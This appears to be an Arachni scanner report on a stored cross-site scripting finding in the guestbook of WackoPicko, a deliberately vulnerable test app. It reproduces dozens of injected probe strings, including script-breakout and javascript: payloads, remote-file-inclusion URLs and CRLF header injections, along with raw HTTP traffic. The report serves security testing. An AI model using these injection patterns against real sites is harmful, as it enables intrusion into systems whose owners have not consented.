arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name"><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit"> </form> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name" /><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit" /> </form> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
name
using
POST
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> </br> <input type="text" name="name"> </input> <br> </br> Comment: <br> </br> <textarea id="comment-box" name="comment"> </textarea> <br> </br> <input type="submit" value="Submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 0.607856 | load |
page
|
|
||
| 1 | 0.095067 | request |
http://192.168.0.26/WackoPicko/guestbook.php |
|
||
| 2 | 0.122892 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
POST /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 90 Content-Type: application/x-www-form-urlencoded comment=1&name=window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink%28%29
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1606
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
